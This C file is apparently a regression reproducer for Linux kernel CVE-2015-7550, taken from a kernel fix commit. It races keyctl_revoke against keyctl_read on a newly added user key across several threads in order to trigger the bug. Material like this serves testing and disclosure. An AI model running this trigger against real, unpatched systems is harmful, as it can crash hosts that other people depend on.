/*
    Author: David Howells <dhowells@redhat.com>
    from linux kernel commit b4a1b4f5047e4f54e194681125c74c0aa64d637d

    CVE-2015-7550
*/

#include <sys/types.h>
#include <keyutils.h>
#include <pthread.h>

void *thr0(void *arg)
{
	key_serial_t key = (unsigned long)arg;
	keyctl_revoke(key);
	return 0;
}

void *thr1(void *arg)
{
	key_serial_t key = (unsigned long)arg;
	char buffer[16];

	keyctl_read(key, buffer, 16);
	return 0;
}

int main()
{
	key_serial_t key = add_key("user", "%", "foo", 3, KEY_SPEC_USER_KEYRING);

	pthread_t th[5];
	pthread_create(&th[0], 0, thr0, (void *)(unsigned long)key);
	pthread_create(&th[1], 0, thr1, (void *)(unsigned long)key);
	pthread_create(&th[2], 0, thr0, (void *)(unsigned long)key);
	pthread_create(&th[3], 0, thr1, (void *)(unsigned long)key);

	pthread_join(th[0], 0);
       	pthread_join(th[1], 0);
	pthread_join(th[2], 0);
       	pthread_join(th[3], 0);

	return 0;
}

